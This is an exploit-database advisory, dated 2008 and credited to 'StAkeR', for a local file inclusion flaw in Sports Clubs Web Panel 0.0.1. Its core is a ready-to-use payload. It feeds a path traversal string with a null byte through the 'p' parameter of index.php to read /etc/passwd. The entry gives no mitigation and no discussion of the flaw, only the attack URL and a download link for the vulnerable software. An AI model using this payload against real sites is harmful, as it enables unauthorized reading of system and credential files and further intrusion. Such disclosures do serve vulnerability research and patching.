id: 3643
date: 09/10/2008
title: Sports Clubs Web Panel 0.0.1 (p) Local File Inclusion Vulnerability
author: StAkeR
cves: 

===================================================================
Sports Clubs Web Panel 0.0.1 (p) Local File Inclusion Vulnerability
===================================================================



--==+============================================================================+==--
--==+   Sports Clubs Web Panel 0.0.1 Local File Inclusion Vulnerability          +==--    
--==+============================================================================+==--

 [*] Discovered By: StAkeR 
 [+] Discovered On: 11 Sep 2008
 [+] Download: http://sourceforge.net/project/downloading.php?group_id=188949&use_mirror=ovh&filename=sportspanel-0.0.1a.tar.gz&50146370

 [*] Vulnerability:
 
 [*] LFI
 [+] index.php?p= [File %00]
 [+] http://site.com/index.php?p=../../../../../../../etc/passwd%00




#  0day.today [2023-03-24]  #